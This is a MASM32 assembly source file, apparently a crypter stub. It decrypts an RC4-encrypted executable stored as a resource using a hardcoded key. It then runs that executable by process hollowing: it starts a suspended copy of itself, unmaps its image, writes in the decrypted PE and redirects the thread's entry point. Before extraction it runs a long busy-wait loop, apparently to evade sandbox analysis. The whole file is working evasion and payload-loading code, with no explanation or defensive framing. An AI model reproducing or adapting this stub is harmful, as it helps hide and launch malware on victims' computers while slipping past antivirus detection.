.386.model flat, stdcalloption casemap:noneinclude \masm32\include\windows

1. .386
2. .model flat, stdcall
3. option casemap:none
4. include \masm32\include\windows.inc
5. include \masm32\include\kernel32.inc
6. include \masm32\include\shell32.inc
7. include \masm32\include\ntdll.inc
8. includelib \masm32\lib\kernel32.lib
9. includelib \masm32\lib\shell32.lib
10. includelib \masm32\lib\ntdll.lib
11. .data
12. mPath byte 256 dup (0)
13. password byte 'datpass', 0
14. .data?
15. hInstance dword ?
16. loop_stopper dword ?
17. ResInf        dword ?
18. hResourceSize dword ?
19. rc4keytable db 256 dup (?)
20. .code
21. Rc4_setkey proc Pass:DWORD, LenPass:DWORD
22. pushad
23.  
24. mov eax, 0FFFEFDFCh
25. mov ecx, 256/4
26. Init_rc4keytable:
27. mov dword ptr [rc4keytable+4*ecx-4], eax
28. sub eax, 04040404h
29. dec ecx
30. jnz Init_rc4keytable
31.  
32. xor eax, eax
33. mov edi, Pass
34.  
35. Key_return:
36. xor ebx, ebx
37. mov esi ,LenPass
38. jmp New_key
39.  
40. Key_loop:
41. inc bl
42. dec esi
43. jz Key_return
44.  
45. New_key:
46. mov dl, byte ptr [rc4keytable+ecx]
47. add al, byte ptr [edi+ebx]
48. add al, dl
49. mov dh, byte ptr [rc4keytable+eax]
50. mov byte ptr [rc4keytable+ecx], dh
51. mov byte ptr [rc4keytable+eax], dl
52. inc cl
53. jnz Key_loop
54.  
55. popad
56. ret
57. Rc4_setkey endp
58.  
59. Rc4_crypt proc iData:DWORD, LenData:DWORD
60. pushad
61. mov edi, LenData
62. mov esi, iData
63. test edi, edi
64. jz Rc4_enc_exit
65.  
66. xor eax, eax
67. xor edx, edx
68. xor ecx, ecx
69.         xor ebx, ebx
70.  
71. Rc4_enc_loop:
72. inc bl
73. mov dl, byte ptr [rc4keytable+ebx]
74. add al, dl
75. mov cl, byte ptr [rc4keytable+eax]
76. mov byte ptr [rc4keytable+ebx], cl
77. mov byte ptr [rc4keytable+eax], dl
78. add cl, dl
79. mov cl, byte ptr [rc4keytable+ecx]
80. xor byte ptr [esi], cl
81. inc esi
82. dec edi
83. jnz Rc4_enc_loop
84.  
85. xor eax, eax
86. mov edi, offset rc4keytable
87. mov ecx, 256/4
88. cld
89. rep stosd
90.  
91. Rc4_enc_exit:
92. popad
93. ret
94. Rc4_crypt endp
95.  
96. ExtractFile proc
97. local hResource:dword
98. LOCAL sinfo: STARTUPINFO
99. LOCAL pinfo: PROCESS_INFORMATION
100. LOCAL base: dword
101. LOCAL sec: ptr IMAGE_SECTION_HEADER
102. LOCAL cnt: CONTEXT
103. invoke GetModuleFileName, 0, offset mPath, 256
104. invoke GetModuleHandle, 0
105. mov hInstance, eax
106. invoke FindResource, hInstance, 1212, RT_RCDATA
107. .if eax != 0
108.   mov hResource, eax
109.   invoke SizeofResource, hInstance, hResource
110.   .if eax != 0
111.     mov hResourceSize, eax
112.     invoke LoadResource, hInstance, hResource
113.     .if eax != 0
114.       invoke LockResource, eax
115.         mov ResInf , eax
116.         invoke lstrlen,addr password
117.         invoke Rc4_setkey,addr password,eax
118.         invoke Rc4_crypt,ResInf,hResourceSize
119.         invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
120.         invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
121.         invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
122.         mov cnt.ContextFlags, CONTEXT_INTEGER
123.         invoke GetThreadContext, pinfo.hThread, addr cnt
124.         invoke GetModuleHandle, 0
125.         invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
126.         mov edi, ResInf
127.         add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
128.         assume edi:  ptr IMAGE_NT_HEADERS
129.         invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
130.         mov base, eax
131.         invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
132.         lea eax, [edi].OptionalHeader
133.         mov sec, eax
134.         movzx eax, [edi].FileHeader.SizeOfOptionalHeader
135.         add sec, eax
136.         xor eax, eax
137.         xor esi, esi
138.         xor ecx, ecx
139.         .while ( si < [edi].FileHeader.NumberOfSections )
140.             imul eax, esi, sizeof IMAGE_SECTION_HEADER
141.             add eax, sec
142.             mov ebx, base
143.             add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
144.             mov edx, ResInf
145.             add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
146.             invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
147.             inc esi
148.         .endw
149.         mov eax, base
150.         add eax, [edi].OptionalHeader.AddressOfEntryPoint
151.         mov cnt.regEax, eax
152.         invoke SetThreadContext, pinfo.hThread, addr cnt
153.         invoke ResumeThread, pinfo.hThread
154.         ret
155.     .endif
156.   .endif
157. .endif  
158. ExtractFile endp
159.  
160. _entrypoint:
161. mov loop_stopper,500000000
162. loop_start:
163. mov eax,0
164. push eax
165. pop eax
166. cmp loop_stopper, 0
167. dec loop_stopper
168. jg loop_start
169. invoke ExtractFile
170. invoke ExitProcess, 0
171. end _entrypoint